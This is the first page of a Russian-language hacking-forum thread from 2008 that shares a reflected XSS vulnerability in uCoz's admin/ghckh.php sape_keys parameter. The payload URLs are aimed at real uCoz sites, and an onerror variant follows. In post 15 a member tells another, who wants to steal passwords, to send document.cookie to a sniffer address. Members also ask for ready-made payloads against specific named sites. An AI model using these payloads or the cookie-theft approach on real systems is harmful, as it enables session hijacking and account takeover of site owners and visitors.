Ucoz xss

Discussion in 'Уязвимости' started by foopi, 28 Dec 2008.

Page 1 of 2
  1. foopi

    foopi Member

    Joined:
    26 Oct 2008
    Messages:
    41
    Likes Received:
    20
    Reputations:
    5
    Вот xss найденная мною на юкозе:
    Code:
    [site.ucoz.ru]/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript:alert()%3E
    Пример:
    Code:
    http://cat.ucoz.ru/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript:alert()%3E
     
    #1 foopi, 28 Dec 2008
    14 people like this.
  2. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Ыыыыыыы))))
    Юкоз пахекали=)))
    Code:
    http://www.ucoz.ru/admin/ghckh.php?sape_keys=%22%3E%3Cimg%20src=javascript:alert()%3E
    :D:D:D
    Малаца, держи канфетко=)
     
    #2 -m0rgan-, 28 Dec 2008
  3. foopi

    foopi Member

    Joined:
    26 Oct 2008
    Messages:
    41
    Likes Received:
    20
    Reputations:
    5
    неправда всё работает)
     
    #3 foopi, 28 Dec 2008
  4. DVD_RW

    DVD_RW Banned

    Joined:
    27 Apr 2008
    Messages:
    0
    Likes Received:
    202
    Reputations:
    -36
    В ФФ не пашет
     
    #4 DVD_RW, 28 Dec 2008
  5. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    В Опере все гуд!
     
    #5 -m0rgan-, 28 Dec 2008
  6. k0lbasa

    k0lbasa Elder - Старейшина

    Joined:
    25 May 2008
    Messages:
    189
    Likes Received:
    131
    Reputations:
    -9
    пробел надеюсь не забыл убрать, двдрв?)
     
    #6 k0lbasa, 28 Dec 2008
    1 person likes this.
  7. DVD_RW

    DVD_RW Banned

    Joined:
    27 Apr 2008
    Messages:
    0
    Likes Received:
    202
    Reputations:
    -36
    ога..под ие6 пашет...под фф не хочет ^_^
     
    #7 DVD_RW, 28 Dec 2008
  8. m0sk

    m0sk Member

    Joined:
    27 Oct 2008
    Messages:
    28
    Likes Received:
    7
    Reputations:
    -4
    гут
     
    #8 m0sk, 29 Dec 2008
  9. Xcontrol212

    Xcontrol212 Elder - Старейшина

    Joined:
    13 Feb 2008
    Messages:
    253
    Likes Received:
    110
    Reputations:
    7
    ff не пашет,на ие 5 и опера 9.62 пашет!
     
    #9 Xcontrol212, 29 Dec 2008
  10. none222

    none222 Guest

    Reputations:
    0
    .................../>  フ.....................
         |  _  _|
         /`ミ _x 彡
         /      |
        /  ヽ   ノ
     / ̄|   | | |
     | ( ̄ヽ__ヽ_)_)
     \二つ
     
    #10 none222, 29 Dec 2008
    Last edited by a moderator: 6 Nov 2020
  11. Sasuke-kun

    Sasuke-kun New Member

    Joined:
    9 Jul 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Уже не пашет =(
     
    #11 Sasuke-kun, 29 Dec 2008
  12. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Sasuke-kun, че у тебя не пашет???)
    Все там пашет!!!111адинадинадин
    Пробелы убери прост :D:D:D
     
    #12 -m0rgan-, 29 Dec 2008
  13. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    дайте пример на сайт prostota.ucoz.org, уж очень хочется посмотреть, а то смотрю и не пашет(
     
    #13 Arigona, 29 Dec 2008
  14. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    всё, понял, а как с ней увести пароль как то можно? снифером трудно будет
     
    #14 Arigona, 29 Dec 2008
  15. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Пробуй так:
    alert(адрес снифера+document.cookie)
     
    #15 -m0rgan-, 29 Dec 2008
  16. Chrome~

    Chrome~ Elder - Старейшина

    Joined:
    13 Dec 2008
    Messages:
    936
    Likes Received:
    162
    Reputations:
    27
    Реально. Автору зачет.
     
    #16 Chrome~, 29 Dec 2008
  17. Sasuke-kun

    Sasuke-kun New Member

    Joined:
    9 Jul 2008
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    хм..а у меня не пашет,можите дать готовый пример например к сайту naruto-fan.ru он на ucoz'е
     
    #17 Sasuke-kun, 29 Dec 2008
  18. Chrome~

    Chrome~ Elder - Старейшина

    Joined:
    13 Dec 2008
    Messages:
    936
    Likes Received:
    162
    Reputations:
    27
    Для Mozilla Firefox, Opera и некоторых других браузеров успешно работает такая конструкция:

    Code:
    http://cat.ucoz.ru/admin/ghckh.php?sape_keys="><img src="a"onerror=alert("XSS")>
     
    #18 Chrome~, 29 Dec 2008
    Last edited: 29 Dec 2008
  19. Alexandr II

    Alexandr II -=ImperatoR=-

    Joined:
    28 Dec 2007
    Messages:
    1,069
    Likes Received:
    671
    Reputations:
    87
    всё пашет и пашет нормально ;) заслужил +
     
    #19 Alexandr II, 29 Dec 2008
  20. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    уже прикрыли ?(
     
    #20 geforse, 30 Dec 2008
(You must log in or sign up to post here.)
Page 1 of 2
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.